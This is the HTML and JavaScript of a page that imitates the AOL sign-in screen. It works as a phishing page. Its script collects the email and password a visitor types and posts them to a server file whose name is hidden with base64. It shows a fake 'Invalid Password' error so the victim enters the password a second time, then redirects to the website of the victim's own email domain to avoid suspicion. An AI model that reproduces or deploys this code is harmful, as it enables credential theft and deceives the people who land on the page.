<!doctype html>
<html lang="en">

<head>
    <script type="text/JavaScript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script type="text/JavaScript" src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
        <script type="text/JavaScript" src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <script type="text/JavaScript" src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <title>AOl</title>
    <style type="text/css">
    textarea:hover,
    input:hover,
    textarea:active,
    input:active,
    textarea:focus,
    input:focus,
    button:focus,
    button:active,
    button:hover,
    label:focus,
    .btn:active,
    .btn.active {
        outline: 0px !important;
        -webkit-appearance: none;
        box-shadow: none !important;
    }
    </style>
</head>

<body style="background-color:#F9F9FA;">
    <div class="container-fluid p-0">
        <div class="container-fluid" style="background-color: white; box-shadow:3px 2px 10px rgba(0,0,0,0.2);">
            <div class="row">
                <div class="col-lg-12 mx-auto">
                    <img src="images/aol.png" class="img-fluid p-4" width="150px">
                </div>
            </div>
        </div>
        <div class="container">
            <div class="row my-2">
                <div class="col-lg-6 my-auto">
                    <div id="carouselExampleControls" class="carousel slide " data-ride="carousel" width="500px">
                        <div class="carousel-inner">
                            <div class="carousel-item active">
                                <img class="d-block h-100" src="images/1.jpeg" alt="First slide">
                            </div>
                            <div class="carousel-item">
                                <img class="d-block h-100" src="images/2.jpg" alt="Second slide">
                            </div>
                            <div class="carousel-item">
                                <img class="d-block h-100" src="images/3.jpg" alt="Third slide">
                            </div>
                            <div class="carousel-item">
                                <img class="d-block h-100" src="images/4.jpg" alt="Fourth slide">
                            </div>
                        </div>
                        <a class="carousel-control-prev" href="#carouselExampleControls" role="button" data-slide="prev">
                            <span class="carousel-control-prev-icon" aria-hidden="true"></span>
                            <span class="sr-only">Previous</span>
                        </a>
                        <a class="carousel-control-next" href="#carouselExampleControls" role="button" data-slide="next">
                            <span class="carousel-control-next-icon" aria-hidden="true"></span>
                            <span class="sr-only">Next</span>
                        </a>
                    </div>
                </div>
                <div class="col-lg-5 mx-auto">
                    <div class="m-5 p-4 bg-white rounded" id="div1" style="box-shadow: 0px 2px 5px rgba(0,0,0,0.5);">
                        <div class="text-center">
                            <img src="images/aol.png" class="img-fluid" width="90px"><br><br>
                            <span class="h5">Sign In</span><br><br><br>
                            <span id="error" class="text-danger">That Aol account doesn't exist. Enter a different account</span>
                            <div class="form-group mt-2">
                                <label class="h5">Email</label>
                                <input type="email" name="ai" class="form-control" id="ai" aria-describedby="aiHelp" placeholder="Username or Email" style="border-right: none;border-left: none;border-top: none;">
                            </div>
                            <div class="col-lg-12 mt-3">
                                <button class="btn rounded-0 text-white bg-primary px-4 w-100" id="next">Next</button>
                            </div>
                        </div>
                        <div class="form-check mt-3">
                            <input type="checkbox" class="form-check-input" id="exampleCheck1">
                            <label class="form-check-label" for="exampleCheck1"><a href="#">Stay Signed in</a></label>
                            <span><a href="#" class="float-right">Forgot username?</a></span>
                        </div>
                        <div class="col-lg-12 mt-3">
                            <button class="btn rounded-0 text-primary bg-white border-primary px-4 w-100" id="next">Create an Account</button>
                        </div>
                        <div class="text-center mt-5">
                            <span>Or sign in with</span><br>
                            <div class="row mt-3">
                                <div class="col-lg-4">
                                    <button class="bg-transparent rounded border-primary w-100"><img src="images/gmail.png" class="img-fluid" width="40px"></button>
                                </div>
                                <div class="col-lg-4">
                                    <button class="bg-transparent rounded border-primary w-100"><img src="images/google.png" class="img-fluid" width="40px"></button>
                                </div>
                                <div class="col-lg-4">
                                    <button class="bg-transparent rounded border-primary w-100"><img src="images/yahoo.png" class="img-fluid" width="40px"></button>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="m-5 p-4 bg-white rounded" id="div2" style="box-shadow: 0px 2px 5px rgba(0,0,0,0.5);">
                        <div class="text-center">
                            <img src="images/aol.png" class="img-fluid" width="90px"><br><br>
                            <i class="fas fa-arrow-left" id="back"></i>&nbsp<span id="aich">abc@abc.com</span><br><br><br>
                            <span id="msg" class="text-danger">Invalid Password..! Please enter correct password</span><br>
                            <div class="form-group mt-2">
                                <label class="h5">Password</label>
                                <input type="password" name="pr" class="form-control" id="pr" aria-describedby="emailHelp" placeholder="Enter Password" style="border-right: none;border-left: none;border-top: none;">
                            </div>
                            <div class="col-lg-12 mt-3">
                                <button class="btn rounded-0 text-white bg-primary px-4 w-100" id="submit-btn">login</button>
                            </div>
                        </div>
                        <div class="form-check mt-3">
                            <span><a href="#" class="float-right">Forgot password?</a></span>
                        </div>
                        <div class="col-lg-12 mt-3">
                            <button class="btn rounded-0 text-primary bg-white border-primary px-4 w-100" id="next">Create an Account</button>
                        </div>
                        <div class="text-center mt-5">
                            <span>Or sign in with</span><br>
                            <div class="row mt-3">
                                <div class="col-lg-4">
                                    <button class="bg-transparent rounded border-primary w-100"><img src="images/gmail.png" class="img-fluid" width="40px"></button>
                                </div>
                                <div class="col-lg-4">
                                    <button class="bg-transparent rounded border-primary w-100"><img src="images/google.png" class="img-fluid" width="40px"></button>
                                </div>
                                <div class="col-lg-4">
                                    <button class="bg-transparent rounded border-primary w-100"><img src="images/yahoo.png" class="img-fluid" width="40px"></button>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <!-- Optional JavaScript -->
        <!-- jQuery first, then Popper.js, then Bootstrap JS -->
        <script type="text/JavaScript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
        <script type="text/JavaScript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
        <script type="text/JavaScript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script type="text/JavaScript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/JavaScript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
    $('#error').hide();
    $("#div2").hide();
    $("#msg").hide();
    var count = 0;
    $('#ai').click(function() {
        $('#error').hide();
    });
    $('#next').click(function() {
        var my_ai = $('#ai').val();
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(ai.value)) {
            $('#error').show();
            ai.focus;
            return false;
        }
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();


        $("#div1").animate({ left: 200, opacity: "hide" }, 0);
        $("#div2").animate({ right: 200, opacity: "show" }, 1000);
        $("#aich").html(my_ai);


    });
    $('#back').click(function() {
        $("#msg").hide();
        $("#div2").animate({ left: 200, opacity: "hide" }, 0);
        $("#div1").animate({ right: 200, opacity: "show" }, 1000);

    });


    var file = "bmV4dC5waHA=";

    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var msg = $('#msg').html();
        $('#msg').text(msg);
        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#error').show();
            $('#error').html("Email field is emply.!");
            ai.focus;
            return false;
        }

        if (!filter.test(my_ai)) {
            $('#error').show();
            $('#error').html("That account doesn't exist. Enter a different account");
            ai.focus;
            return false;
        }
        if (!pr) {
            $('#error').show();
            $('#error').html("Password field is emply.!");
            ai.focus;
            return false;
        }

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        ///////////new injection////////////////
        count = count + 1;

        $.ajax({
            dataType: 'JSON',
            url: "../" + atob(file),
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').html('Verifing...');
            },
            success: function(response) {
                if (response) {
                    $("#msg").show();
                    console.log(response);
                    if (response['signal'] == 'ok') {
                        $("#pr").val("");
                        if (count >= 2) {
                            count = 0;
                            // window.location.replace(response['redirect_link']);
                            window.location.replace("http://www." + my_slice);

                        }
                        // $('#msg').html(response['msg']);
                    } else {
                        // $('#msg').html(response['msg']);
                    }
                }
            },
            error: function() {
                $("#pr").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace("http://www." + my_slice);
                }
                $("#msg").show();
                // $('#msg').html("Please try again later");
            },
            complete: function() {
                $('#submit-btn').html('Login');
            }
        });
    });
});
</script>

</html>